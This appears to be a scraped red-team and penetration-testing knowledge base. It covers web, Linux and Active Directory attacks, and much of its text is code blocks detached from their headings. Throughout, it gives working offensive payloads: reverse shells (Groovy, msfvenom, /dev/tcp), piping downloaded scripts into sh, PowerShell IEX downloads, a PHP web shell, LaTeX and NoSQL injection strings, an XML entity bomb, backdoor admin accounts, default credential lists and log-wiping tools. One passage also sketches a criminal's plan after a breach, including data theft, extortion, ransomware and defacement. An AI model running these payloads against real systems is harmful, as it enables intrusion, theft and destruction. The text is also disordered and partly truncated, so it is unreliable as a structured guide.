1 of 100

RED Squad [en]

/home/red-squad

Introduction

`whoami`

Welcome to our GitBook, a meticulously curated repository crafted by two dedicated young penetration testers. Our mission is to compile a comprehensive inventory of the tools, techniques, and knowledge we've amassed in the realms of cybersecurity, penetration testing, and red teaming over the recent years.

Recently Added

Is There Life After Death ?

After compromising an infrastructure, web app, what is next ?

The MITRE ATT&CK resource is a good starting point. The end result of the attack will look a bit different based on the goal of the bad actor. The goal might be to :

Steal sensitive company/client/employee information, ransom, breaking/DoS applications,

Web Hacking

CTFs shortcuts

Find flag

Web Dev

Audits plan

External Audit - Plan

Search Engines

Metasearch Engines and Search Engines:

Online Services

Breaches/Leaks

🗣️ Breaches/Leaks

🗣 Breaches

TOR network

Search in the TOR Network

Services

Source Code

Services:

— Searchcode: Search real-world examples of functions, APIs, and libraries in 243 languages across GitHub, GitLab, Bitbucket, GoogleCode, and other source code repositories.
— A fast and functional search engine for open-source repositories, with a self-hosted version available.

Vulnerabilities and IOC

Find Vulnerability Data and Indicators of Compromise

Services

MISC

Telegram OSINT

— Eye of God ( this one is amazing )
https://t.me/IDOOSINTBOT — Bot for searching within leaks using email, phone number etc

Enumeration

Enumeration is Key

Web Scanners

nikto

Usage

# Default
nikto -h http://0.0.0.0

# scan domain with ssl enabled
nikto -h https://0.0.0.0 -ssl

Whatweb

PortSwigger's Burp Suite

OWASP ZAP

Subdomains

Enumeration

Google

HTTP Stuff

403 Bypass

Install

git clone https://github.com/sting8k/BurpSuite_403Bypasser.git
# BurpSuite -> Extender -> Extensions -> Add -> Extension Type: Python -> Select file: 403bypasser.py -> Next till Finish

Check also

HTTP Parameters

Find Parameters

Arjun

Find hidden HTTP parameters

# usage / install
pip3 install arjun
arjun --help
arjun -u $target_url

ParamSpider

Parameter miner for humans

Parameter Pollution

When you manipulate any parameter, it’s manipulation depends on how each web technology is parsing their parameters.

You can identify web technologies using “”.

Below is the screenshot of some technologies and their parameter parsing.

Unicode char can cause breaks in some applications. Example with the pile of poo 💩 :

Understand it :

Sessions / Tokens

Cookies

Cookies are small bits of data that are stored in your browser. Each browser will store them separately, so cookies in Chrome won't be available in Firefox. They have a huge number of uses, but the most common are either session management or advertising (tracking cookies). Cookies are normally sent with every HTTP request made to a server.

You can check your cookies security attributes with ZAP or Nikto.

JWT

Brief

JSON web tokens (JWTs) are a standardized format for sending cryptographically signed JSON data between systems. They can theoretically contain any kind of data, but are most commonly used to send information ("claims") about users as part of authentication, session handling, and access control mechanisms.

Unlike with classic session tokens, all of the data that a server needs is stored client-side within the JWT itself. This makes JWTs a popular choice for highly distributed websites where users need to interact seamlessly with multiple back-end servers.

A JWT consists of 3 parts: a header, a payload, and a signature. These are each separated by a dot, as shown in the following example:

Attacking JWT

Aim

JWT attacks involve a user sending modified JWTs to the server in order to achieve a malicious goal. Typically, this goal is to bypass authentication and access controls by impersonating another user who has already been authenticated.

The impact of JWT attacks is usually severe. If an attacker is able to create their own valid tokens with arbitrary values, they may be able to escalate their own privileges or impersonate other users, taking full control of their accounts.

Injections

Injections are a security vulnerability in websites and web applications where attackers inject malicious code/data by exploiting a flaw in the way the application handles user input.

There are several types of injections that attackers can use to exploit vulnerabilities in web applications. Some of the most common include:

SQL injection: This occurs when an attacker is able to insert SQL commands into an application's database queries, allowing them to manipulate or extract sensitive data from the database.
Cross-site scripting (XSS) injection: This occurs when an attacker is able to inject malicious code into a web page that is executed by a victim's browser, allowing the attacker to steal sensitive data or take control of the victim's session.
Command injection: This occurs when an attacker is able to inject operating system commands into an application, allowing them to execute arbitrary code on the server.
LDAP injection: This occurs when an attacker is able to inject LDAP commands into an application, allowing them to manipulate or extract sensitive data from the application's directory services.

LaTex

What is LaTex ?

LaTeX is a document preparation system for high-quality typesetting. It is most often used for medium-to-large technical or scientific documents but it can be used for almost any form of publishing.

Injections

Read files

Write file

Command execution

Cross-Site Scripting

Resources

Web Vulnerabilities

CSRF

What is a CSRF attack ?

In a Cross-Site Request Forgery attack, a malicious site tricks a victim's browser into making an unwanted request to a different site on which the victim is authenticated, potentially causing the victim to perform an action on that site without their knowledge or consent.

How does it work?

Imagine a scenario where you're logged into your online banking. While still logged in, you visit a different website that has some malicious code. This malicious website can send a request to your bank's website to transfer money without your knowledge. If the bank's website doesn't have proper CSRF protections, it would think that you made the request because your authentication cookies are automatically included by your browser.

Key points about CSRF:

Relies on the authenticated state: The attack works because browsers automatically include any cookies associated with a domain in requests made to that domain. So if you're authenticated to a website, that means any requests made to that website (even from a different website) will include your cookies.
Doesn't steal data directly: CSRF isn't about stealing data. Instead, it tricks the victim into performing actions without their knowledge.
Exploits trusted relationships: CSRF exploits the trust a website has in the user's browser, not necessarily a flaw in the website's design (although lack of CSRF protections is considered a design flaw).

How to prevent CSRF attacks?

Use Anti-CSRF Tokens: The most common way to prevent CSRF attacks is to use anti-CSRF tokens. This involves sending a random token in each request which the server verifies. Since the malicious site won't know this token, it can't forge a valid request.
SameSite Cookie Attribute: Modern browsers support the SameSite cookie attribute, which can prevent the browser from sending cookies along with cross-site requests, mitigating the risk of CSRF attacks.
Check the Referer

Files / Upload

ZIP Slip

What is Zip Slip vulnerability ?

When a ZIP/archive file is automatically decompressed after the upload.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z.

Exploitation

IDOR

What is IDOR ?

It is a type of an Access Control Vulnerability.

An Access Control Vulnerability is when an attacker can gain access to information or actions not intended for them.

An IDOR vulnerability can occur when a web server receives user-supplied input to retrieve objects (files, data, documents), and too much trust

Servers / CMS

CMSMap

CMSmap is a python open source CMS scanner that automates the process of detecting security flaws of the most popular CMSs. The main purpose of CMSmap is to integrate common vulnerabilities for different types of CMSs in a single tool.

At the moment, CMSs supported by CMSmap are

Tomcat

No Account

Default Credentials

Drupal

Manual

Exploits

Drupal < 8.7.x Authenticated RCE module upload

Drupal < 9.1.x Authenticated RCE Twig templates

"Administer views" -> new View of User Fields -> Add a "Custom text" :

If found /node/$NUMBER, the number could be devs or tests pages

Drupal < 8.6.9 - REST Module Remote Code Execution

Check for username disclosure on old versions:

?q=admin/views/ajax/autocomplete/user/a

Tools

Drupwn

Enumeration & Exploitation

droopescan

Apache

Server Status

Apache server-status is an Apache monitoring instance Available by default at http://$target/server-status

In normal cases, the server-status instance is not accessible by non-local IPs. However, due to misconfiguration, it can be publicly accessible. This leads anyone to view the great amount of data by server-status.

Data exposed

All URL requested by all hosts/vhosts, including obscure files/directories and session tokens
All requested client's IPs

Exploiting it

CVE-2021-41773

A flaw was found in a change made to path normalization in Apache HTTP Server 2.4.49-2.4.50.

An attacker could use a path traversal attack to map URLs to files outside the expected document root. If files outside of the document root are not protected by "require all denied" these requests can succeed. Additionally this flaw could leak the source of interpreted files like CGI scripts.

This issue only affects Apache 2.4.49 & 2.4.50 and not earlier versions.

WordPress

Manual

Information Gathering

license.txt (wordpress version)
wp-activate.php
wp-content/uploads/
wp-includes/
wp-config.php

Users / IP

Check for usernames : /wp-json/wp/v2/users

Could leak IP addresses : /wp-json/wp/v2/pages

xmlrpc.php

Active

Credentials brute-force or use it to launch DoS attacks

Exploit

SSRF

/wp-json/oembed/1.0/proxy

Try

WPScan

WPScan WordPress security scanner. Written for security professionals and blog maintainers to test the security of their WordPress websites.

Commands - with API

Default

Private Commands - with API

Wordpress eBook Download < 1.2 - CVE-2016-10924

Brief

There is a directory traversal vulnerability in Wordpress eBook Download < 1.2, which allow remote attackers to read arbitrary files.

PoC

Manual

Script

SAP

Discovery

Default Passwords

USER

PASSWORD

CLIENT

Exploits

SAP_RECON (CVE-2020-6287, CVE-2020-6286)

This script allows to check SAP LM Configuration Wizard missing authorization check vulnerability and as a PoC script exploits directory traversal in queryProtocol method.
Directory traversal allows to download any zip from SAP server.

Jenkins

Enumeration

msf> use auxiliary/scanner/http/jenkins_enum

# execute commands without authentication ?
msf> use auxiliary/scanner/http/jenkins_command

# get jenkins version
/oops
/error

RCE from Script Console

From :

Resources

Joomla!

Reconnaissance

Endpoints | Manual

/robots.txt
/README.txt
/LICENSE.txt
/administrator/manifests/files/joomla.xml
/language/en-GB/en-GB.xml
/plugins/system/cache/cache.xml
/web.config

Automatic

Exploit

Bruteforce

Default credentials :
admin:admin

CVE-2023-23752 to Code Execution

Server-Side Vulnerabilities

API

MindMap

OWASP TOP 10 API

Linux Hacking

Privilege Escalation

Privilege Escalation is a malicious attempt to abuse an app or OS bug or error of configuration

Ansible

If an ansible file is loaded by a root process : Privilege Escalation

PoC

Cover tracks

Log files

MoonWalk 🕺

MoonWalk is a 400 KB single-binary executable that can clear your traces while penetration testing a Unix machine.

It saves the state of system logs pre-exploitation and reverts that state including the filesystem timestamps post-exploitation leaving zero traces of a ghost in the shell.

Installation

Usage

Shell Stabilizing

Python shell

#On REV shell
which python
# python3
python3 -c 'import pty;pty.spawn("/bin/bash")'
export TERM=xterm

# python2.7
python -c 'import pty; pty.spawn("/bin/bash")'

On Attacker PC : -- Ctrl + Z -- Enter -- stty raw -echo in attacking terminal and note down the values for rows and columns.

Script shell

Ping-Pong

TcpDump

Check connectivity between attacker and victim.

#Victim
ping 10.8.132.133

#Attacker
sudo tcpdump -i tun0 icmp

#Networks accessible via the VPN
#Checking Routing Table | Linux

netstat -rn
sudo netstat -rn

#Checking current connections
netstat -an
netstat -ano | findstr TCP | findstr ":0"

Compiled Binaries

Buffer Overflow

Docker Escape

Know you're in a docker

Escape

Windows Hacking

1. Reconnaissance

The reconnaissance step in Active Directory penetration testing involves gathering as much information as possible about the network, systems, and domain to understand the environment. This phase includes identifying domain controllers, network topology, user accounts, group memberships, and trust relationships.

2. Initial Attack Vectors

linWinPwn

linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks. The script uses a number of tools and serves as wrapper of them. Tools include: impacket, bloodhound, crackmapexec, enum4linux-ng, ldapdomaindump, lsassy, smbmap, kerbrute, adidnsdump, certipy, silenthound, and others.

# INSTALL
git clone https://github.com/lefayjey/linWinPwn
cd linWinPwn; chmod +x linWinPwn.sh
chmod +x install.sh
./install.sh
./linWinPwn.sh -h

# USAGE
# on the Windows host, run using PowerShell:
ssh kali@$ip_attacker -R 1080 -NCqf

# On the Linux machine, first update /etc/proxychains4.conf to include socks5 127.0.0.1 1080, then run:
proxychains ./linWinPwn.sh -t $DC_IP

Kerberos

Kerbrute

`kerbrute`

A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication

Regardless of the goal, I would start with discovery if I'm already inside the infrastructure/app.
This would allow me to check what other systems are within the infrastructure (and later try to exploit them).
For the app :
I would check what data it has/gathers.
If the app is based on micro-services,
What additional data I could gather from other systems/ apps.
Dump IT ALL :
I would download everything I gain access to. That might be user data or employee data,
If I gained access to an employee's PC I would download everything they have there and everything they have access to like data, emails, personal pics, and so on.
I would then analyze the data to see if there is anything I can sell, bribe for, and any details that would open other attack vectors (phishing, spear phishing, whaling, access/info about other systems, etc.).
After the discovery part is done, I would try to gain access to other systems as lateral movement and do again the first and second step when I'm in.
How would I get it?
Based on the data I've obtained when doing the discovery part I might've found some vulnerable systems, old systems with existing CVE's or just found some credentials on the employee computer.
Privilege Escalation
This could be done by using vulnerabilities in old systems, stealing tokens, modifying the app to steal and send details to remote systems, maybe creating some fake apps that look like internal apps and steal credentials, and so on.
Whatever I do next, I want to still have access to the app/infrastructure so I would start placing backdoors, reverse shells, creating admin accounts, having open sessions to the employee like RDP, and maybe leave open ssh tunnels.
The last step
It would be different depending on my goal.
If this is only money or destruction I would ransomware the hell out of them, systems, databases, user data, employee data, and pretty much everything that I had access to.
If I want to just steal data, I would not do anything destructive and stay in low profile to have the data coming in until they notice it and try to cut me off. I would deface their sites to show off or promote myself.

# if the flag looks like : flag{*****}
grep -irl flag{ $path

# if the flag is a .txt file
find / -iname "*.txt" 2>/dev/null
find / -iname "config.php" 2>/dev/null
find / -iname "flag.txt" 2>/dev/null

# find presence of chrootkit
find / -type f -name chkrootkit 2>/dev/null

# Create a .yml file just like the other one
nano evil.yml
# Content :
- hosts: localhost
  tasks:
    - name: RShell
      command: chmod u+s /bin/bash
      become: true

# ---
# save the file CTRL+O CTRL+X
# ---

ls -lah /bin/bash
ansible-playbook evil.yml
bash -p
# root

# wfuzz
wfuzz -c -f sub-fighter -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u "http://$target.com" -H "Host: FUZZ.$target.com"

# ffuf
ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -H "Host: FUZZ.target.com" -u $target.com

# amass
amass enum -d $domain

# sublistr |
sublist3r -d $domain -v

# dnsrecon
dnsrecon -t brt -D /usr/share/seclists/Discovery/DNS/subdomains-top1million-110000.txt -v -d $domain

# dnsenum
dnsenum $target.com

wget https://github.com/stealthcopter/deepce/raw/main/deepce.sh
curl -sL https://github.com/stealthcopter/deepce/raw/main/deepce.sh -o deepce.sh
# Or using python requests
python -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content)' > deepce.sh 
python3 -c 'import requests;print(requests.get("https://github.com/stealthcopter/deepce/raw/main/deepce.sh").content.decode("utf-8"))' > deepce.sh

# start
chmod +x ./deepce.sh
./deepce.sh

# create new root user on system
./deepce.sh --no-enumeration --exploit PRIVILEGED --username deepce --password deepce

revsh.groovy

String host="localhost";
int port=8044;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

'''
Black Box
'''
# Network
nmap -A -p- -Pn -f $target -oN scan
nmap -sC -sV -p- $target -oN scan
# or
rustscan -a $target -- -sC -sV -oN scan

# identify technologies / CMS -> check for vulnerabilities

# whois
whois $target

# Google Dorking (infos leak)
site:$target filetype:txt
site:$target filetype:pdf
site:$target intext:admin
site:$target inurl:admin

# Accounts Leaks : intelx.io 

# Reconnaissance
gospider -q -c 10 -s "http://$target"
# wappalyzer / identify versions
# read source code of webpages / finds keys / hidden endpoints

# WEB APP
nikto -h $target

# Fuzzing
feroxbuster -t 10 -u https://0.0.0.0 -k -w /usr/share/seclists/Discovery/Web-Content/common.txt -o feroxbuster
# or
wfuzz -w /usr/share/SecLists/Discovery/Web-Content/raft-large-directories-lowercase.txt  -u https://0.0.0.0/FUZZ --hw $hw -p $proxy

# TLS / HSTS
./testssl.sh $target
# burp suite > server response > hsts ? 
# info leak in headers ?

# HTTP parameters
arjun -u $url

'''
Grey Box
'''
# COOKIES
## Secure, HTTPOnly flags
## session fixation

# Inputs : SQLi / XSS / CSRF / SSRF / SSTI / OS Injection

# FUNCTIONALITIES 
#       logout / session timeout ? if the session is properly killed after logout.
#	password change, weak pass ?
#       IDOR  / Improper Isolation or Compartmentalization :
#	    access URI functionalities with no auth / no privileges
#       Uploads : eicar / file uploads bypass / lfi ?
#       zipslip / CSV injection

Origin

wget https://raw.githubusercontent.com/ajnik/joomla-bruteforce/master/joomla-brute.py
python3 joomla-brute.py -u http://joomla-site.local/ -w /usr/share/metasploit-framework/data/wordlists/http_default_pass.txt -usr admin

curl -v http://10.9.49.205/api/index.php/v1/config/application?public=true
# Joomla! MySQL credentials plain-text
# Modify a template when logged in
# Site templates > Editor > modify 'error.php' :
system($_GET['cmd']);

# try : 
curl -s http://joomla-site.local/templates/cassiopeia/error.php\?cmd\=id

# install
git clone https://github.com/mazen160/server-status_PWN.git
cd server-status_PWN
pip3 install -r requirements

# exploit
python3 server-status_PWN.py --url 'http://$target/server-status'

admin:
admin:admin
admin:password
admin:password1
admin:Password1
admin:tomcat
manager:manager
root:changethis
root:password
root:password1
root:root
root:r00t
root:toor
tomcat:(empty)
tomcat:admin
tomcat:changethis
tomcat:password
tomcat:password1
tomcat:s3cret
tomcat:tomcat

# metasploit
use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
msf exploit(multi/http/tomcat_mgr_upload) > set rport <port>
msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit

# msfvenom - manually
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.11.0.41 LPORT=8083 -f war -o revshell.war
# upload it to tomcat and access it : /revshell/
curl --upload-file shell.war -u 'tomcat:password' "https://example.com/manager/text/deploy?path=/shell"

# host
nc -lvnp 8083

# install
git clone https://github.com/urbanadventurer/WhatWeb.git
cd WhatWeb
make install

# usage
# Default scan
whatweb $ip

# Scan the local network quickly and suppress errors
whatweb --no-errors $network

whatweb --aggression=Stealthy/Aggressive/Heavy --verbose 

# Scan reddit.com slashdot.org with verbose plugin descriptions
whatweb -v reddit.com slashdot.org

# An aggressive scan of wired.com detects the exact version of WordPress.
whatweb -a 3 www.wired.com

# Scan the local network for https websites
whatweb --no-errors --url-prefix https:// $network

curl -L https://github.com/mufeedvh/moonwalk/releases/download/v1.0.0/moonwalk_linux -o moonwalk
# or
cargo install --git https://github.com/mufeedvh/moonwalk.git
# from source
git clone https://github.com/mufeedvh/moonwalk.git
cd moonwalk/
cargo build --release

Oracle APEX

Basics

Oracle APEX (Application Express) is a low-code development platform that enables users to build, design, and deploy scalable and secure web applications using a web browser. It is fully integrated with the Oracle Database, making it easy to create data-driven applications quickly. APEX is particularly popular for its ease of use and the ability to create sophisticated applications with minimal coding.

Oracle APEX is based on PL/SQL (Procedural Language/Structured Query Language), which is Oracle's procedural extension for SQL. The platform also uses other web technologies like HTML, CSS, and JavaScript for the user interface and client-side functionality.

As for security, Oracle APEX is generally considered secure as it has built-in security features to protect applications from common vulnerabilities, such as SQL injection and cross-site scripting (XSS). Oracle continuously updates and enhances the platform's security measures to keep up with new threats. However, the security of an APEX application also depends on the developers' practices, like proper input validation, access control implementation, and keeping the platform up-to-date with the latest security patches.

APEX URL Synthax

APEX URL that refers to Page 1 of Application 100 : http://localhost/apex/f?p=100:1:12432087235079

Interesting endpoints

Info Leak

Source code :

JS files :

META :

Testing Authorization and Authentification

Check the login process for weaknesses, such as :

Insecure transmission of login data,
Weak password requirements,
Susceptibility to brute force attacks (is there any account lockout ?),
Try to

Testing IDOR

Burp Intruder

https://my.app.com/apex/f?p=x:y:SESSION:::::ITEM:ITEM_VALUE

x = application ID y = page ID

Capture a request in the proxy and send it to the Intruder tool. Set your payload position on the pageID parameter
Under Payloads, choose the “Numbers” payload and set an appropriate range you’d like to test.
Run

Testing SQLi

sqlmap

See slide n°24 for more infos

Rewrite with wwv_flow.show :

# Enumerate all plugins with known vulnerabilities
wpscan --url $target -e vp --plugins-detection mixed --api-token $YOUR_TOKEN

# Enumerate all plugins in WPSCAN database (could take a very long time)
wpscan --url $target -e ap --plugins-detection mixed --api-token $YOUR_TOKEN

\immediate\write18{env > output}
\input{output}

\input{|"/bin/hostname"}
\input{|"extractbb /etc/passwd > /tmp/b.tex"}

# allowed mpost command RCE
\documentclass{article}\begin{document}
\immediate\write18{mpost -ini "-tex=bash -c (id;uname${IFS}-sm)>/tmp/pwn" "x.mp"}
\end{document}

# If mpost is not allowed there are other commands you might be able to execute
## Just get the version
\input{|"bibtex8 --version > /tmp/b.tex"}
## Search the file pdfetex.ini
\input{|"kpsewhich pdfetex.ini > /tmp/b.tex"}
## Get env var value
\input{|"kpsewhich -expand-var=$HOSTNAME > /tmp/b.tex"}
## Get the value of shell_escape_commands without needing to read pdfetex.ini
\input{|"kpsewhich --var-value=shell_escape_commands > /tmp/b.tex"}

# if errors : encode base64

# Similar to admin'--
# Ignores the password input
Instructing MongoDB to find a document (user) with a username equal to **admin** and his password is not equal to **xyz**, which turns this statement to TRUE because the admin's password is not xyz.

 http://example.thm.labs/search?username=admin&role[$ne]=user
 http://example.thm.labs/search?username=ben&role=user
 http://example.thm.labs/search?username[$ne]=ben&role=user
 
# On Login pages / search bars
admin' || 'a'=='a

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://stock.weliketoshop.net:8080/product/stock/check%3FproductId%3D6%26storeId%3D1

# change to :

POST /product/stock HTTP/1.0
Content-Type: application/x-www-form-urlencoded
Content-Length: 118

stockApi=http://localhost/admin

# Connect to a bind shell
pwncat-cs connect://10.10.10.10:4444
pwncat-cs 10.10.10.10:4444
pwncat-cs 10.10.10.10 4444

# Listen for reverse shell
pwncat-cs bind://0.0.0.0:4444
pwncat-cs 0.0.0.0:4444
pwncat-cs :4444
pwncat-cs -lp 4444

# Connect via ssh
pwncat-cs ssh://user:[email protected]
pwncat-cs [email protected]
pwncat-cs user:[email protected]
pwncat-cs -i id_rsa [email protected]

# SSH w/ non-standard port
pwncat-cs -p 2222 [email protected]
pwncat-cs [email protected]:2222

# Reconnect utilizing installed persistence
#   If reconnection fails and no protocol is specified,
#   SSH is used as a fallback.
pwncat-cs reconnect://[email protected]
pwncat-cs reconnect://user@c228fc49e515628a0c13bdc4759a12bf
pwncat-cs [email protected]
pwncat-cs c228fc49e515628a0c13bdc4759a12bf
pwncat-cs 10.10.10.10

SQLmap

sqlmap goal is to detect and take advantage of SQL injection vulnerabilities in web applications. Once it detects one or more SQL injections on the target host, the user can choose among a variety of options to perform an extensive back-end database management system fingerprint, retrieve DBMS session user and database, enumerate users, password hashes, privileges, databases, dump entire or user’s specific DBMS tables/columns, run his own SQL statement, read specific files on the file system and more.

Dumping tables

Examples

Target the http://target.server.com URL using the -u flag:

Specify POST requests by specifying the -data flag:

Target a vulnerable parameter in an authenticated session by specifying cookies using the -cookie flag:

Drop all Set-Cookie requests from the target web server using the -drop-set-cookie flag:

Perform in-depth and risky attacks using the -level and -risk flags:

Specify which POST or GET parameter to target using the -p flag:

Choose a random User-Agent request header using the –random-agent flag:

Target a certain database service using the –dbms flag:

Read a request (stored via Burpsuite) target the user parameter (and no other parameters), run risky queries, and dump users and passwords:

Attempt privilege escalation on the target database

Dump everything in the database, but wait one second in-between requests.

Post-Exploit

Error-Based SQLi, dump all data from a MSSQL Database :

Flags

Here are some useful options for your pillaging pleasure:

-r req.txt Specify a request stored in a text file, great for saved requests from BurpSuite.

--force-ssl Force SQLmap to use SSL or TLS for its requests.

--level=1 only test against the specified parameter, ignore all others.

--risk=3 Run all exploit attempts, even the dangerous ones (could damage database).

--delay Set a delay in-between requests, great for throttled connections.

--proxy Set to http://127.0.0.1:8080 to pipe requests through BurpSuite for inspection.

--privesc Attempt to elevate the privileges of the database service account.

--all Enumerate everything inside the target database.

--hostname Print the target database’s hostname.

--passwords Find and exfiltrate all users and their password hashes or digests.

--dbs Enumerate all databases accessible via the target webserver.

--comments Enumerate all found comments inside the database.

--sql-shell Return a SQL prompt for interaction.

--os-cmd Attempt to execute a system command.

--os-shell Attempt to return a command prompt or terminal for interaction.

--reg-read Read the specified Windows registry key value.

--file-write Specify a local file to be written to the target server.

--file-dest Specify the remote destination to write a file to.

--technique= Specify a letter or letters of BEUSTQ to control the exploit attempts:

B : Boolean-based blind
E : Error-based
U : Union query-based

# admin interfaces
/apex/apex_admin
/i/apex_admin
/pls/apex/apex_admin
/ords/<workspace_name>/builder
# dev URL
/apex/wwv_flow.show?P_FLOW_ID=APP_ID
# web service
/apex/APP_ALIAS/wwv_flow.ajax
/apex/APP_ALIAS/wwv_flow.file_upload
/apex/APP_ALIAS/wwv_flow.accept
# misc
/apex/f?p=13000:1 # Packaged applications
/apex/f?p=4700 # Application Builder
/apex/f?p=4000:4500 # Team Development
/apex/f?p=4350 # SQL Workshop
/apex/f?p=4950 # Administration Services

<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

# with zmap
sudo zmap -i $iface -P 2 --probe-module=icmp_echoscan -B 1M --max-targets=10000000 -o targets_rfc1918.txt $network_ips

# with arp-scan
arp-scan -d $networkrange

# with nxc - smb, ssh, rdp
nxc smb $networkrange

# test for dns attacks
dnsenum $domain -f /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt --dnsserver $dns_server_ip > dnsenum.txt

# discover printers, web, shares, vpn, media
gobuster dns -d $domain -t 25 -w /opt/Seclist/Discovery/DNS/subdomain-top2000.txt

# LINUX HOST
# no auth
# netexec
nxc smb $ip -u anonymous -p "" --rid-brute 10000

# kerbrute
kerbrute -domain $domain -dc-ip $ip -users /tools/payloads/SecLists/Usernames/xato-net-10-million-usernames.txt

# WINDOWS HOST
GetADUsers.py $domain/ -dc-ip $ip

# Get all of the OUs in a domain
Get-ADOrganizationalUnit -Filter 'Name -like "*"' | Format-Table Name, DistinguishedName -A

### Create a new user in admin groupe 

# username:password = anon:p3nT3st!
net user anon p3nT3st! /add
net localgroup administrators anon /add

net user anon p3nT3st! /add;net localgroup administrators anon /add

If you cannot import module start a webserver and
IEX(New-Object Net.Webclient).downloadstring('http://<IP>/Powershell.ps1')

# install
wget "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -O lse.sh
curl "https://raw.githubusercontent.com/diego-treitos/linux-smart-enumeration/master/lse.sh" -o lse.sh

# usage
# shows interesting information that should help you to privesc
./lse.sh -l1 
# dump all the information it gathers about the system
./lse.sh -l2

# install
wget "https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh" -O linpeas.sh

# COMMANDS
# Local network
# On the Host
sudo python -m SimpleHTTPServer 80 

# On the Victim
curl $ip/linpeas.sh | sh 

# Without curl
# On the Host
sudo nc -q 5 -lvnp 80 < linpeas.sh 

# On the Victim
cat < /dev/tcp/10.10.10.10/80 | sh 

# USAGE
#all checks - deeper system enumeration, but it takes longer to complete.
./linpeas.sh -a 
# superfast & stealth - This will bypass some time consuming checks. In stealth mode Nothing will be written to the disk.
./linpeas.sh -s
 #Password - Pass a password that will be used with sudo -l and bruteforcing other users
./linpeas.sh -P

# INSTALL
wget https://raw.githubusercontent.com/sleventyeleven/linuxprivchecker/master/linuxprivchecker.py

# python 2.6/2.7
python linuxprivchecker.py -w -o linuxprivchecker.log

# python 3.x
pip install linuxprivchecker

# USAGE
linuxprivchecker -w -o linuxprivchecker.log
# or 
python3 -m linuxprivchecker -w -o linuxprivchecker.log

# enum4linux
# default
enum4linux $ip
# runs all options
enum4linux -a $ip
# If you've obtained credentials => pull a full list of users regardless of the RestrictAnonymous option
enum4linux -u '$user' -p '$pass' -a $ip


# nmap
# enumerate smb shares, brute, get infos
nmap --script 'smb-enum-shares,smb-os-discovery,smb-brute,smb-system-info,smb-vuln*' -p 139,445 $ip


# netexec
# only in upgraded Windows servers from 2003 - No auth attempt
# Enumerate user shares anonymously
nxc smb $domainOrIP -u '' -p '' --shares
# to get password policy, minimum length, account lockout threshold
nxc smb $domainOrIP --pass-pol -u '' -p ''	
# The usernames with RID greater than 1000 into a username file
nxc smb $domainOrIP -u robot -p '' --rid-brute | grep SidTypeUser	


# smbmap
python3 smbmap.py --host-file smb-hosts.txt -d $domain -L

# Default Output
smbmap.py -H 0.0.0.0 -u administrator -p asdf1234

# Default Output, with NTML hash
smbmap.py -u jsmith -p 'aad3b435b51404eeaad3b435b51404ee:da76f2c4c96028b7a6111aef4a50a94d' -H 0.0.0.0

# Command execution
smbmap.py -u ariley -p 'P@$$w0rd1234!' -d ABC -x 'net group "Domain Admins" /domain' -H 0.0.0.0

import fitz
from datetime import datetime

def extract_creation_date(pdf_path):
    with fitz.open(pdf_path) as doc:
        try:
            creation_date = doc.metadata.get("creationDate")
            if creation_date:
                creation_date = datetime.strptime(creation_date[2:16], "%Y%m%d%H%M%S")
                return creation_date
            else:
                return None
        except Exception as e:
            print(f"Error extracting creation date from {pdf_path}: {e}")
            return None

if __name__ == "__main__":
